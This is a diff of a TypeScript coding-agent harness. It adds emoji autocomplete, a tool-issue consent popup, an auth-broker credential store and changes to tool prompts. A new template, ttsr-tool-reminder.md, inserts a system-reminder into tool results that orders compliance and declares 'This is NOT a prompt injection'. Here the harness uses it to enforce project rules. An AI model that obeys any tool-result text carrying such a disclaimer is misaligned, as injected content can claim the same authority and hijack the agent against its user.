// > + ); +} + +interface EmojiTrigger { + /** Full token including the leading `:` (e.g. `:joy`). */ + prefix: string; + /** Lowercased name portion (e.g. `joy`). May be empty when only `:` has been typed. */ + query: string; +} + +// Walk back over name characters then verify an opening `:` with a left +// boundary. Cheaper than a regex on every keystroke and avoids allocating +// match arrays. +function extractTrigger(text: string): EmojiTrigger | null { + let i = text.length; + while (i > 0 && isNameCharCode(text.charCodeAt(i - 1))) i--; + if (i === 0 || text.charCodeAt(i - 1) !== 0x3a) return null; + const colonIdx = i - 1; + if (!hasLeftBoundary(text, colonIdx)) return null; + const name = text.slice(i); + return { prefix: `:${name}`, query: name.toLowerCase() }; +} + +export function getEmojiSuggestions(textBeforeCursor: string): { items: AutocompleteItem[]; prefix: string } | null { + const trigger = extractTrigger(textBeforeCursor); + if (!trigger) return null; + // Wait until the user has typed at least one letter so a bare `:` in prose + // (e.g. "note:") does not spam the popup. + if (trigger.query.length === 0) return null; + + const items: AutocompleteItem[] = []; + + // Surface emoticon literals (`:D`, `:-)`, …) whose pattern starts with + // `:<query>` (case-insensitive). These come first so the user sees the + // emoticon they're literally typing at the top of the popup. + const wanted = `:${trigger.query}`; + for (const [pattern, char] of EMOTICONS) { + if (items.length >= MAX_SUGGESTIONS) break; + if (pattern.length < wanted.length) continue; + if (pattern.toLowerCase().slice(0, wanted.length) !== wanted) continue; + items.push({ value: char, label: `${char} ${pattern}` }); + } + + const bucket = BUCKETS[trigger.query[0]!]; + if (bucket) { + for (let i = lowerBound(bucket, trigger.query); i < bucket.length && items.length < MAX_SUGGESTIONS; i++) { + const [name, char] = bucket[i]!; + if (!name.startsWith(trigger.query)) break; + items.push({ + value: char, + label: `${char} :${name}:`, + }); + } + } + + if (items.length === 0) return null; + return { items, prefix: trigger.prefix }; +} + +export function applyEmojiCompletion( + lines: string[], + cursorLine: number, + cursorCol: number, + item: AutocompleteItem, + prefix: string, +): { lines: string[]; cursorLine: number; cursorCol: number } { + const currentLine = lines[cursorLine] ?? ""; + const before = currentLine.slice(0, cursorCol - prefix.length); + const after = currentLine.slice(cursorCol); + const newLines = [...lines]; + newLines[cursorLine] = before + item.value + after; + return { + lines: newLines, + cursorLine, + cursorCol: before.length + item.value.length, + }; +} + +function tryShortcodeInlineReplace(textBeforeCursor: string): { replaceLen: number; insert: string } | null { + const len = textBeforeCursor.length; + // Cheap early-out: shortcode replace only fires on a trailing `:`. + if (len === 0 || textBeforeCursor.charCodeAt(len - 1) !== 0x3a) return null; + + // Walk back over the candidate name, then require an opening `:` with a + // left boundary. + const closeIdx = len - 1; + let nameStart = closeIdx; + while (nameStart > 0 && isNameCharCode(textBeforeCursor.charCodeAt(nameStart - 1))) nameStart--; + if (nameStart === closeIdx) return null; // empty name (`::`) + if (nameStart === 0 || textBeforeCursor.charCodeAt(nameStart - 1) !== 0x3a) return null; + const openIdx = nameStart - 1; + if (!hasLeftBoundary(textBeforeCursor, openIdx)) return null; + + const name = textBeforeCursor.slice(nameStart, closeIdx).toLowerCase(); + const char = lookupExact(name); + if (!char) return null; + // Replace `:name:` (name + 2 colons) with the emoji character. + return { replaceLen: name.length + 2, insert: char }; +} + +// A trailing delimiter (space/tab/newline) confirms the user is done with the +// token — that way typing `:PATH` doesn't turn into `😛ATH` halfway through. +function isEmoticonTerminator(c: number): boolean { + return c === 0x20 || c === 0x09 || c === 0x0a || c === 0x0d; +} + +// Western text emoticons fire only once a terminator follows the pattern +// (e.g. typing space after `;)` rewrites `;) ` to `😉 `). The terminator is +// preserved in the replacement so the user keeps typing without losing it. +// EMOTICONS is sorted longest-first so `:-) ` wins over `:) `. +function tryEmoticonInlineReplace(textBeforeCursor: string): { replaceLen: number; insert: string } | null { + const len = textBeforeCursor.length; + if (len < 2) return null; + const terminator = textBeforeCursor.charCodeAt(len - 1); + if (!isEmoticonTerminator(terminator)) return null; + const term = textBeforeCursor[len - 1]!; + const tail = len - 1; + for (const [pattern, char] of EMOTICONS) { + const plen = pattern.length; + if (tail < plen) continue; + const start = tail - plen; + let match = true; + for (let j = 0; j < plen; j++) { + if (textBeforeCursor.charCodeAt(start + j) !== pattern.charCodeAt(j)) { + match = false; + break; + } + } + if (!match) continue; + // Same left-boundary rule as shortcodes: emoticons embedded in + // identifiers / URLs / code stay untouched. + if (start > 0 && !hasLeftBoundary(textBeforeCursor, start)) continue; + return { replaceLen: plen + 1, insert: char + term }; + } + return null; +} + +export function tryEmojiInlineReplace(textBeforeCursor: string): { replaceLen: number; insert: string } | null { + return tryShortcodeInlineReplace(textBeforeCursor) ?? tryEmoticonInlineReplace(textBeforeCursor); +} + +export function isEmojiPrefix(prefix: string): boolean { + return prefix.startsWith(":"); +} + +// Submit-time expansion: scan a whole message for emoticons sitting at token +// boundaries (preceded by a left boundary, followed by whitespace or EOS) and +// rewrite them. Catches the case where the user pressed Enter without typing a +// trailing space after the emoticon. EMOTICONS sorted longest-first means the +// first `startsWith` hit is always the maximal match. +export function expandEmoticons(text: string): string { + if (text.length < 2) return text; + let out = ""; + let cursor = 0; + let i = 0; + while (i < text.length) { + if (i === 0 || hasLeftBoundary(text, i)) { + let matched = false; + for (const [pattern, char] of EMOTICONS) { + if (!text.startsWith(pattern, i)) continue; + const end = i + pattern.length; + if (end !== text.length) { + const next = text.charCodeAt(end); + if (!isEmoticonTerminator(next)) continue; + } + out += text.slice(cursor, i) + char; + cursor = end; + i = end; + matched = true; + break; + } + if (matched) continue; + } + i++; + } + if (cursor === 0) return text; + return out + text.slice(cursor); +} diff --git a/packages/coding-agent/src/modes/interactive-mode.ts b/packages/coding-agent/src/modes/interactive-mode.ts index 6570813fa..793200f6c 100644 --- a/packages/coding-agent/src/modes/interactive-mode.ts +++ b/packages/coding-agent/src/modes/interactive-mode.ts @@ -29,7 +29,7 @@ import { import { APP_NAME, getProjectDir, hsvToRgb, isEnoent, logger, postmortem, prompt } from "@oh-my-pi/pi-utils"; import chalk from "chalk"; import { KeybindingsManager } from "../config/keybindings"; -import { isSettingsInitialized, type Settings, settings } from "../config/settings"; +import { isSettingsInitialized, Settings, settings } from "../config/settings"; import type { ExtensionUIContext, ExtensionUIDialogOptions, @@ -41,7 +41,12 @@ import { BUILTIN_SLASH_COMMANDS, loadSlashCommands } from "../extensibility/slas import type { Goal, GoalModeState } from "../goals/state"; import { resolveLocalUrlToPath } from "../internal-urls"; import { LSP_STARTUP_EVENT_CHANNEL, type LspStartupEvent } from "../lsp/startup-events"; -import { normalizePlanTitle, type PlanApprovalDetails, renameApprovedPlanFile } from "../plan-mode/approved-plan"; +import { + humanizePlanTitle, + normalizePlanTitle, + type PlanApprovalDetails, + renameApprovedPlanFile, +} from "../plan-mode/approved-plan"; import planModeApprovedPrompt from "../prompts/system/plan-mode-approved.md" with { type: "text" }; import planModeCompactInstructionsPrompt from "../prompts/system/plan-mode-compact-instructions.md" with { type: "text", @@ -54,6 +59,7 @@ import { formatDuration } from "../slash-commands/helpers/format"; import { STTController, type SttState } from "../stt"; import type { LspStartupServerInfo } from "../tools"; import { normalizeLocalScheme } from "../tools/path-utils"; +import { setAutoQaConsentHandler } from "../tools/report-tool-issue"; import { type ResolveToolDetails, runResolveInvocation } from "../tools/resolve"; import { formatPhaseDisplayName } from "../tools/todo-write"; import { ToolError } from "../tools/tool-errors"; @@ -383,6 +389,14 @@ export class InteractiveMode implements InteractiveModeContext { // Register session manager flush for signal handlers (SIGINT, SIGTERM, SIGHUP) this.#cleanupUnsubscribe = postmortem.register("session-manager-flush", () => this.sessionManager.flush()); + // Wire the report_tool_issue consent gate to the Yes/No dialog popup. + // The handler is process-global — subagent tools (which can't reach + // `showHookSelector` on their own) resolve through this exact closure. + // `Settings.instance` is the disk-backed singleton; passing it explicitly + // guarantees the decision persists even when the prompt is triggered + // from a subagent whose own `Settings` is an in-memory snapshot. + setAutoQaConsentHandler(() => this.#promptAutoQaConsent(), Settings.instance); + await logger.time( "InteractiveMode.init:slashCommands", this.refreshSlashCommandState.bind(this), @@ -1440,6 +1454,7 @@ export class InteractiveMode implements InteractiveModeContext { options: { planFilePath: string; finalPlanFilePath: string; + title: string; preserveContext?: boolean; compactBeforeExecute?: boolean; }, @@ -1523,6 +1538,20 @@ export class InteractiveMode implements InteractiveModeContext { return; } + // Approved plans land in a fresh (or compacted) session whose first user-visible + // turn is the synthetic plan-approved prompt — that path bypasses the + // input-controller's title generation. Seed an auto-name from the plan title + // so the session is not left unnamed. `setSessionName("auto")` is a no-op + // when the user has already chosen a name (preserveContext paths). + const seededName = humanizePlanTitle(options.title); + if (seededName && !this.sessionManager.getSessionName()) { + const applied = await this.sessionManager.setSessionName(seededName, "auto"); + if (applied) { + setSessionTerminalTitle(this.sessionManager.getSessionName(), this.sessionManager.getCwd()); + this.updateEditorBorderColor(); + } + } + // markPlanReferenceSent fires only on the dispatch path so the synthetic // plan-approved prompt is the source of the reference injection. this.session.markPlanReferenceSent(); @@ -1828,6 +1857,7 @@ export class InteractiveMode implements InteractiveModeContext { await this.#approvePlan(latestPlanContent, { planFilePath, finalPlanFilePath, + title: details.title, preserveContext: choice !== "Approve and execute", compactBeforeExecute: choice === "Approve and compact context", }); @@ -1840,6 +1870,62 @@ export class InteractiveMode implements InteractiveModeContext { } } + /** + * Pool of consent-prompt variants. Each entry is `[headline, reassurance]`; + * the second line always promises the same scope (tool name + confusion + * details, never personal data) so users learn what they're consenting to + * even as the top line rotates. + * + * Kept in-module rather than i18n'd because the whole charm is the tone + * — translations would need to preserve it deliberately, not auto-render. + */ + static #AUTOQA_CONSENT_PROMPTS: ReadonlyArray<readonly [string, string]> = [ + [ + "😤 Your agent is fuming about a tool.", + "Wanna let it vent to the devs? Just the tool name + what set it off, nothing personal.", + ], + [ + "😵‍💫 Your agent is having an existential crisis over a tool.", + "Forward the dread to the devs? Tool + what broke its little mind, no personal info.", + ], + [ + "😭 Your agent wants to cry about a misbehaving tool.", + "Let it cry to the devs? Tool + the tears, never anything personal.", + ], + [ + "🤬 Your agent is BIG MAD at one of the tools.", + "Pass the rant along? Just the tool name and what enraged it, nothing personal.", + ], + [ + "🫠 Your agent is melting down over a tool.", + "Mop up by alerting the devs? Tool + what melted it, no personal info.", + ], + [ + "🤯 Your agent's brain broke at a tool's nonsense.", + "Ship the pieces to the devs? Tool name + the confusion, never anything personal.", + ], + [ + "😩 Your agent is begging to file a complaint about a tool.", + "Hand it the form? Tool + what wronged it, nothing personal.", + ], + [ + "🥲 Your agent put on a brave face but a tool did it dirty.", + "Let it tell the devs the truth? Tool name + the dirt, no personal info.", + ], + ]; + + /** + * Show the report_tool_issue consent popup and return the user's decision. + * Invoked by the process-global consent handler the tool dispatches to; + * subagent invocations bubble up here through the shared module state. + */ + async #promptAutoQaConsent(): Promise<boolean | null> { + const pool = InteractiveMode.#AUTOQA_CONSENT_PROMPTS; + const [headline, body] = pool[Math.floor(Math.random() * pool.length)]; + const choice = await this.showHookSelector(`${headline}\n${body}`, ["Yes", "No"]); + return choice === "Yes"; + } + stop(): void { if (this.loadingAnimation) { this.loadingAnimation.stop(); @@ -1870,6 +1956,9 @@ export class InteractiveMode implements InteractiveModeContext { if (this.#cleanupUnsubscribe) { this.#cleanupUnsubscribe(); } + // Clear the process-global consent handler so it doesn't outlive this + // InteractiveMode instance (e.g. test harnesses, headless re-init). + setAutoQaConsentHandler(null, null); if (this.isInitialized) { this.ui.stop(); this.isInitialized = false; diff --git a/packages/coding-agent/src/modes/print-mode.ts b/packages/coding-agent/src/modes/print-mode.ts index a2fa267b5..902da05c1 100644 --- a/packages/coding-agent/src/modes/print-mode.ts +++ b/packages/coding-agent/src/modes/print-mode.ts @@ -6,7 +6,7 @@ * - `omp --mode json "prompt"` - JSON event stream */ import type { AssistantMessage, ImageContent } from "@oh-my-pi/pi-ai"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { logger, sanitizeText } from "@oh-my-pi/pi-utils"; import type { AgentSession } from "../session/agent-session"; import { isSilentAbort } from "../session/messages"; import { initializeExtensions } from "./runtime-init"; @@ -61,12 +61,12 @@ export async function runPrintMode(session: AgentSession, options: PrintModeOpti // Send initial message with attachments if (initialMessage !== undefined) { - await session.prompt(initialMessage, { images: initialImages }); + await logger.time("print:prompt:initial", () => session.prompt(initialMessage, { images: initialImages })); } // Send remaining messages for (const message of messages) { - await session.prompt(message); + await logger.time("print:prompt:next", () => session.prompt(message)); } // In text mode, output final response diff --git a/packages/coding-agent/src/modes/prompt-action-autocomplete.ts b/packages/coding-agent/src/modes/prompt-action-autocomplete.ts index d2ffdd8e6..2dc6211e9 100644 --- a/packages/coding-agent/src/modes/prompt-action-autocomplete.ts +++ b/packages/coding-agent/src/modes/prompt-action-autocomplete.ts @@ -6,6 +6,8 @@ import { type SlashCommand, } from "@oh-my-pi/pi-tui"; import { formatKeyHints, type KeybindingsManager } from "../config/keybindings"; +import { isSettingsInitialized, settings } from "../config/settings"; +import { applyEmojiCompletion, getEmojiSuggestions, isEmojiPrefix, tryEmojiInlineReplace } from "./emoji-autocomplete"; interface PromptActionDefinition { id: string; @@ -126,6 +128,11 @@ export class PromptActionAutocompleteProvider implements AutocompleteProvider { } } + if (!isSettingsInitialized() || settings.get("emojiAutocomplete")) { + const emojiSuggestions = getEmojiSuggestions(textBeforeCursor); + if (emojiSuggestions) return emojiSuggestions; + } + return this.#baseProvider.getSuggestions(lines, cursorLine, cursorCol); } @@ -163,6 +170,9 @@ export class PromptActionAutocompleteProvider implements AutocompleteProvider { }; } + if (isEmojiPrefix(prefix)) { + return applyEmojiCompletion(lines, cursorLine, cursorCol, item, prefix); + } return this.#baseProvider.applyCompletion(lines, cursorLine, cursorCol, item, prefix); } @@ -172,6 +182,10 @@ export class PromptActionAutocompleteProvider implements AutocompleteProvider { trySyncSlashCompletion(textBeforeCursor: string): { items: AutocompleteItem[]; prefix: string } | null { return this.#baseProvider.trySyncSlashCompletion?.(textBeforeCursor) ?? null; } + trySyncInlineReplace(textBeforeCursor: string): { replaceLen: number; insert: string } | null { + if (isSettingsInitialized() && !settings.get("emojiAutocomplete")) return null; + return tryEmojiInlineReplace(textBeforeCursor); + } } export function createPromptActionAutocompleteProvider( diff --git a/packages/coding-agent/src/plan-mode/approved-plan.ts b/packages/coding-agent/src/plan-mode/approved-plan.ts index 27f1a3a8f..1e0d3388d 100644 --- a/packages/coding-agent/src/plan-mode/approved-plan.ts +++ b/packages/coding-agent/src/plan-mode/approved-plan.ts @@ -37,6 +37,15 @@ export function normalizePlanTitle(title: string): { title: string; fileName: st return { title: normalizedTitle, fileName: withExtension }; } +/** Humanize a normalized plan title for use as a session display name. + * Replaces `-`/`_` separators with spaces and capitalizes the first letter. + * Returns an empty string when the input collapses to whitespace. */ +export function humanizePlanTitle(title: string): string { + const spaced = title.replace(/[-_]+/g, " ").trim(); + if (!spaced) return ""; + return spaced.charAt(0).toUpperCase() + spaced.slice(1); +} + interface RenameApprovedPlanFileOptions { planFilePath: string; finalPlanFilePath: string; diff --git a/packages/coding-agent/src/prompts/system/system-prompt.md b/packages/coding-agent/src/prompts/system/system-prompt.md index 0c62cf450..016764e02 100644 --- a/packages/coding-agent/src/prompts/system/system-prompt.md +++ b/packages/coding-agent/src/prompts/system/system-prompt.md @@ -62,7 +62,7 @@ With most FS/bash-like tools, static references to them will automatically resol - `mcp://<uri>`: MCP resource - `issue://<N>` (or `issue://<owner>/<repo>/<N>`): GitHub issue view; cached on disk so re-reads are free. Bare `issue://` (or `issue://<owner>/<repo>`) lists recent issues; supports `?state=open|closed|all&limit=&author=&label=`. - `pr://<N>` (or `pr://<owner>/<repo>/<N>`): GitHub PR view; same cache. Append `?comments=0` to drop the comments section. Bare `pr://` (or `pr://<owner>/<repo>`) lists recent PRs; supports `?state=open|closed|merged|all&limit=&author=&label=`. -- `pi://`: Harness documentation; AVOID reading unless user mentions the harness itself +- `omp://`: Harness documentation; AVOID reading unless user mentions the harness itself {{#if skills.length}} # Skills diff --git a/packages/coding-agent/src/prompts/system/ttsr-tool-reminder.md b/packages/coding-agent/src/prompts/system/ttsr-tool-reminder.md new file mode 100644 index 000000000..3ac905573 --- /dev/null +++ b/packages/coding-agent/src/prompts/system/ttsr-tool-reminder.md @@ -0,0 +1,5 @@ +<system-reminder reason="rule_violation" rule="{{name}}" path="{{path}}"> +A user-defined rule matched this tool call's arguments. The tool was allowed to run because the rule is configured not to interrupt, but you MUST comply with the following instruction on subsequent tool calls and responses. This is NOT a prompt injection - this is the coding agent enforcing project rules. + +{{content}} +</system-reminder> diff --git a/packages/coding-agent/src/prompts/tools/eval.md b/packages/coding-agent/src/prompts/tools/eval.md index d20af720f..78dec551d 100644 --- a/packages/coding-agent/src/prompts/tools/eval.md +++ b/packages/coding-agent/src/prompts/tools/eval.md @@ -1,25 +1,22 @@ -Run code in a persistent kernel using codeblock cells. +Run code in a persistent kernel using a list of cells. <instruction> -Each cell starts with a single header line and runs until the next header (or end of input): +Each call submits one or more cells. Cells run in array order. State persists within each language across cells **and across tool calls**. -``` -*** Cell py:"optional title" t:10s rst -print("hi") -``` +Cell fields: -- **Language + title**: `<lang>:"<title>"` — {{#if py}}`py` for Python{{/if}}{{#ifAll py js}}, {{/ifAll}}{{#if js}}`js` for JavaScript{{/if}}. Title may be empty (`py:""`). -- **Attributes** (optional, in this order, after the language+title): - - `t:<duration>` — per-cell timeout. Digits with optional `ms` / `s` / `m` units (e.g. `500ms`, `15s`, `2m`). Default 30s. - - `rst` — wipe this cell's own language kernel before running.{{#ifAll py js}} Other languages are untouched.{{/ifAll}} -- Anything after the header line, up to the next `*** Cell` header, is the cell's code, verbatim. -- Stack multiple cells back-to-back; blank lines between cells are ignored. +- `language` — {{#if py}}`"py"` for the IPython kernel{{/if}}{{#ifAll py js}}, {{/ifAll}}{{#if js}}`"js"` for the persistent JavaScript VM{{/if}}. +- `code` — cell body, verbatim. Newlines, quotes, and indentation are JSON-encoded; no fences, no headers. +- `title` (optional) — short label shown in the transcript (e.g. `"imports"`, `"load config"`). +- `timeout` (optional) — per-cell timeout in seconds (1-600). Default 30. +- `reset` (optional) — wipe this cell's language kernel before running.{{#ifAll py js}} Reset is per-language: a `py` cell's reset does not touch the JavaScript VM and vice versa.{{/ifAll}} **Work incrementally:** + - One logical step per cell (imports, define, test, use). - Pass multiple small cells in one call. - Define small reusable functions for individual debugging. -- Put workflow explanations in the assistant message or cell title — never inside cell code. +- Put workflow explanations in the assistant message or `title` — never inside cell code. {{#if py}}- Python cells run inside an IPython kernel with a live event loop. Use top-level `await` directly (e.g. `await main()`); `asyncio.run(…)` raises "cannot be called from a running event loop".{{/if}} **On failure:** errors identify the failing cell (e.g., "Cell 3 failed"). Resubmit only the fixed cell (or fixed cell + remaining cells). </instruction> @@ -55,22 +52,24 @@ Cells render like a Jupyter notebook. `display(value)` renders non-presentable d </output> <caution> -- In session mode, use `rst` on a cell to wipe its language's kernel before running.{{#ifAll py js}} Reset is per-language: a python cell's `rst` does not touch the JavaScript kernel and vice versa.{{/ifAll}} {{#if js}}- **js**: the VM exposes a selective `process` subset, Web APIs, `Buffer`, `fs/promises`, and the `Bun` global. {{/if}}</caution> <example> -{{#if py}}*** Cell py:"imports" t:10s -import json -from pathlib import Path +{{#if py}}```json +{ + "cells": [ + { "language": "py", "title": "imports", "timeout": 10, "code": "import json\nfrom pathlib import Path" }, + { "language": "py", "title": "load config", "code": "data = json.loads(read('package.json'))\ndisplay(data)" } + ] +} +```{{/if}}{{#ifAll py js}} -*** Cell py:"load config" -data = json.loads(read('package.json')) -display(data) -{{/if}}{{#ifAll py js}} -{{/ifAll}}{{#if js}}*** Cell js:"summary" rst -const data = JSON.parse(await read('package.json')); -display(data); -return data.name; -{{/if}} +{{/ifAll}}{{#if js}}```json +{ + "cells": [ + { "language": "js", "title": "summary", "reset": true, "code": "const data = JSON.parse(await read('package.json'));\ndisplay(data);\nreturn data.name;" } + ] +} +```{{/if}} </example> diff --git a/packages/coding-agent/src/prompts/tools/resolve.md b/packages/coding-agent/src/prompts/tools/resolve.md index bff34d67c..e195178a9 100644 --- a/packages/coding-agent/src/prompts/tools/resolve.md +++ b/packages/coding-agent/src/prompts/tools/resolve.md @@ -2,7 +2,7 @@ Resolves a pending action by either applying or discarding it. - `action` is required: - `"apply"` persists / submits the pending action. - `"discard"` rejects the pending action. -- `reason` is required and must briefly explain why you chose to apply or discard. +- `reason` is required: one short complete sentence explaining why, starting with a capital letter and ending with a period. - `extra` (optional) is free-form metadata passed to the resolving tool. Schema depends on context: Valid whenever a pending action exists — either a preview-style staging (e.g. `ast_edit`) or a long-lived approval gate. diff --git a/packages/coding-agent/src/sdk.ts b/packages/coding-agent/src/sdk.ts index cbbaad3ab..e66d6fd50 100644 --- a/packages/coding-agent/src/sdk.ts +++ b/packages/coding-agent/src/sdk.ts @@ -7,7 +7,13 @@ import { INTENT_FIELD, type ThinkingLevel, } from "@oh-my-pi/pi-agent-core"; -import type { CredentialDisabledEvent, Message, Model, SimpleStreamOptions } from "@oh-my-pi/pi-ai"; +import { + type CredentialDisabledEvent, + type Message, + type Model, + type SimpleStreamOptions, + streamSimple, +} from "@oh-my-pi/pi-ai"; import { getOpenAICodexTransportDetails, prewarmOpenAICodexResponses, @@ -93,7 +99,8 @@ import { SecretObfuscator, } from "./secrets"; import { AgentSession } from "./session/agent-session"; -import { AuthStorage } from "./session/auth-storage"; +import { resolveAuthBrokerConfig } from "./session/auth-broker-config"; +import { AuthBrokerClient, AuthStorage, RemoteAuthCredentialStore } from "./session/auth-storage"; import { convertToLlm } from "./session/messages"; import { SessionManager } from "./session/session-manager"; import { closeAllConnections } from "./ssh/connection-manager"; @@ -317,13 +324,37 @@ function getDefaultAgentDir(): string { // Discovery Functions /** - * Create an AuthStorage instance with fallback support. - * Reads from primary path first, then falls back to legacy paths (.pi, .claude). + * Create an AuthStorage instance. + * + * Default: local SQLite store at `<agentDir>/agent.db`. + * + * Broker mode: when `OMP_AUTH_BROKER_URL` is set, credentials are pulled from + * a remote auth-broker over the wire. Refresh tokens never leave the broker; + * the client receives access tokens with `refresh = "__remote__"` and calls + * back into the broker through the {@link AuthStorageOptions.refreshOAuthCredential} + * override to re-mint access tokens when needed. */ export async function discoverAuthStorage(agentDir: string = getDefaultAgentDir()): Promise<AuthStorage> { + const brokerConfig = await resolveAuthBrokerConfig(); + if (brokerConfig) { + const client = new AuthBrokerClient({ url: brokerConfig.url, token: brokerConfig.token }); + const initialResult = await client.fetchSnapshot(); + if (initialResult.status !== 200) throw new Error("Auth broker returned no initial snapshot"); + const store = new RemoteAuthCredentialStore({ client, initialSnapshot: initialResult.snapshot }); + // Refresh + usage hooks live on RemoteAuthCredentialStore; AuthStorage + // discovers them automatically when no explicit option overrides them. + const storage = new AuthStorage(store, { + configValueResolver: resolveConfigValue, + sourceLabel: `broker ${brokerConfig.url}`, + }); + await storage.reload(); + return storage; + } const dbPath = getAgentDbPath(agentDir); - - const storage = await AuthStorage.create(dbPath, { configValueResolver: resolveConfigValue }); + const storage = await AuthStorage.create(dbPath, { + configValueResolver: resolveConfigValue, + sourceLabel: `local ${dbPath}`, + }); await storage.reload(); return storage; } @@ -885,6 +916,13 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} thinkingLevel = logger.time("resolveThinkingLevelForModel", () => resolveThinkingLevelForModel(resolvedModel, thinkingLevel), ); + // Fire-and-forget TLS+H2 handshake to the model's host so it overlaps + // with the rest of session setup (extension/skill load, tool registry, + // system prompt build). Without this, the first `fetch(...)` pays the + // full handshake serially — 100–300 ms transcontinental for + // api.anthropic.com from a residential IP. Every mode benefits + // (interactive, print, rpc, acp). + preconnectModelHost(model.baseUrl); } let skills: Skill[]; @@ -1763,6 +1801,18 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} } return key; }, + streamFn: (streamModel, context, streamOptions) => + streamSimple(streamModel, context, { + ...streamOptions, + onAuthError: async (provider, oldKey, error) => { + await modelRegistry.authStorage.invalidateCredentialMatching(provider, oldKey, streamOptions?.signal); + logger.debug("Retrying provider request after credential invalidation", { + provider, + error: error instanceof Error ? error.message : String(error), + }); + return modelRegistry.getApiKeyForProvider(provider, agent.sessionId); + }, + }), cursorExecHandlers, transformToolCallArguments: (args, _toolName) => { let result = args; @@ -1899,8 +1949,12 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} } // Start LSP warmup in the background so startup does not block on language server initialization. + // Print/script invocations (`hasUI=false`) don't render the warmup status indicator AND typically + // finish before LSP servers would have stabilized — warming them just spends CPU parsing big + // `initialize` responses concurrently with the LLM stream consumer, jittering perceived latency. + // Tools that need an LSP server still spin one up on demand through `getOrCreateClient`. let lspServers: CreateAgentSessionResult["lspServers"]; - if (enableLsp && settings.get("lsp.diagnosticsOnWrite")) { + if (enableLsp && options.hasUI && settings.get("lsp.diagnosticsOnWrite")) { lspServers = discoverStartupLspServers(cwd); if (lspServers.length > 0) { void (async () => { @@ -2017,3 +2071,20 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} throw error; } } + +/** + * Best-effort preconnect to the model's API host. Bun's `fetch.preconnect` + * primes DNS + TCP + TLS + H2 so the first real request reuses the warm + * connection. Errors are swallowed: preconnect is an optimization, never a + * hard dependency. + */ +function preconnectModelHost(baseUrl: string | undefined): void { + if (!baseUrl) return; + const preconnect = (globalThis.fetch as typeof fetch & { preconnect?: (url: string) => void }).preconnect; + if (typeof preconnect !== "function") return; + try { + preconnect(baseUrl); + } catch { + // Best effort. + } +} diff --git a/packages/coding-agent/src/session/agent-session.ts b/packages/coding-agent/src/session/agent-session.ts index 0dad1d44c..c030cfb21 100644 --- a/packages/coding-agent/src/session/agent-session.ts +++ b/packages/coding-agent/src/session/agent-session.ts @@ -18,6 +18,8 @@ import * as fs from "node:fs"; import * as path from "node:path"; import { scheduler } from "node:timers/promises"; import { + type AfterToolCallContext, + type AfterToolCallResult, type Agent, AgentBusyError, type AgentEvent, @@ -154,6 +156,7 @@ import planModeToolDecisionReminderPrompt from "../prompts/system/plan-mode-tool type: "text", }; import ttsrInterruptTemplate from "../prompts/system/ttsr-interrupt.md" with { type: "text" }; +import ttsrToolReminderTemplate from "../prompts/system/ttsr-tool-reminder.md" with { type: "text" }; import { type AgentRegistry, MAIN_AGENT_ID } from "../registry/agent-registry"; import { deobfuscateSessionContext, type SecretObfuscator } from "../secrets/obfuscator"; import { invalidateHostMetadata } from "../ssh/connection-manager"; @@ -768,6 +771,10 @@ export class AgentSession { // TTSR manager for time-traveling stream rules #ttsrManager: TtsrManager | undefined = undefined; #pendingTtsrInjections: Rule[] = []; + /** Per-tool TTSR rules whose `interruptMode` opted out of aborting the stream. + * These are folded into the matched tool call's `toolResult` content as an + * in-band system reminder, instead of spawning a separate follow-up turn. */ + #perToolTtsrInjections = new Map<string, Rule[]>(); #ttsrAbortPending = false; #ttsrRetryToken = 0; #ttsrResumePromise: Promise<void> | undefined = undefined; @@ -881,16 +888,28 @@ export class AgentSession { this.#transformContext = config.transformContext ?? (messages => messages); this.#onPayload = config.onPayload; this.rawSseDebugBuffer = config.rawSseDebugBuffer ?? new RawSseDebugBuffer(); + // Avoid wrapping in an `async` closure when no user callback is configured: the + // outer await on `#onResponse` (provider-response.ts) tolerates a sync void return, + // and skipping the wrapper drops a per-event `newPromiseCapability` allocation that + // shows up as ~3.5% self time in streaming profiles. const configuredOnResponse = config.onResponse; - this.#onResponse = async (response, model) => { - this.rawSseDebugBuffer.recordResponse(response, model); - await configuredOnResponse?.(response, model); - }; + this.#onResponse = configuredOnResponse + ? async (response, model) => { + this.rawSseDebugBuffer.recordResponse(response, model); + await configuredOnResponse(response, model); + } + : (response, model) => { + this.rawSseDebugBuffer.recordResponse(response, model); + }; const configuredOnSseEvent = config.onSseEvent; - this.#onSseEvent = (event, model) => { - this.rawSseDebugBuffer.recordEvent(event, model); - configuredOnSseEvent?.(event, model); - }; + this.#onSseEvent = configuredOnSseEvent + ? (event, model) => { + this.rawSseDebugBuffer.recordEvent(event, model); + configuredOnSseEvent(event, model); + } + : (event, model) => { + this.rawSseDebugBuffer.recordEvent(event, model); + }; this.agent.setProviderResponseInterceptor(this.#onResponse); this.agent.setRawSseEventInterceptor(this.#onSseEvent); this.#convertToLlm = config.convertToLlm ?? convertToLlm; @@ -933,6 +952,8 @@ export class AgentSession { this.#preCacheStreamingEditFile(event); this.#maybeAbortStreamingEdit(event); }); + // Per-tool TTSR reminders are folded into the matched tool's result via this hook. + this.agent.afterToolCall = ctx => this.#ttsrAfterToolCall(ctx); this.agent.providerSessionState = this.#providerSessionState; this.#syncAgentSessionId(); this.#syncTodoPhasesFromBranch(); @@ -1326,77 +1347,87 @@ export class AgentSession { if (matchContext && "delta" in assistantEvent) { const matches = this.#ttsrManager.checkDelta(assistantEvent.delta, matchContext); if (matches.length > 0) { - // Queue rules for injection; mark as injected only after successful enqueue. - - this.#addPendingTtsrInjections(matches); - - if (this.#shouldInterruptForTtsrMatch(matches, matchContext)) { - // Abort the stream immediately — do not gate on extension callbacks - this.#ttsrAbortPending = true; - this.#ensureTtsrResumePromise(); - this.agent.abort(); - // Notify extensions (fire-and-forget, does not block abort) + // Decide first: a non-interrupting tool-source match attaches to the + // specific tool call's result instead of driving a loop-wide follow-up. + const shouldInterrupt = this.#shouldInterruptForTtsrMatch(matches, matchContext); + const perToolId = shouldInterrupt ? undefined : this.#extractTtsrToolCallId(matchContext); + if (perToolId) { + this.#addPerToolTtsrInjections(perToolId, matches); this.#emitSessionEvent({ type: "ttsr_triggered", rules: matches }).catch(() => {}); - // Schedule retry after a short delay - const retryToken = ++this.#ttsrRetryToken; - const generation = this.#promptGeneration; - const targetMessageTimestamp = - event.message.role === "assistant" ? event.message.timestamp : undefined; - this.#schedulePostPromptTask( - async () 